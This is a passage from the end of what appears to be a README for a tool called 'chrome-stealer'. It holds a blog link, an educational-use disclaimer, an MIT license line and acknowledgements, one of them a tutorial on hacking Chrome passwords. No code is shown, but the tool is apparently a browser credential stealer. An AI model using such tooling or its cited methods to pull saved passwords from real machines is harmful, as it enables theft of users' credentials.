blog](https://bernking.github.io//2024/chrome-stealer/).\n\n## Disclaimer\n\nThis tool is intended for educational purposes only. Misuse of this tool can lead to legal consequences. Always ensure you have permission before using it on any system. The author is not responsible for any misuse of this tool.\n\n## License\n\nThis project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.\n\n## Acknowledgements\n\n- [libsodium](https://libsodium.gitbook.io/doc/)\n- [nlohmann/json](https://github.com/nlohmann/json)\n- [sqlite3](https://www.sqlite.org/index.html)\n- [How to Hack Chrome Password with Python](https://ohyicong.medium.com/how-to-hack-chrome-password-with-python-1bedc167be3d)\n" } ]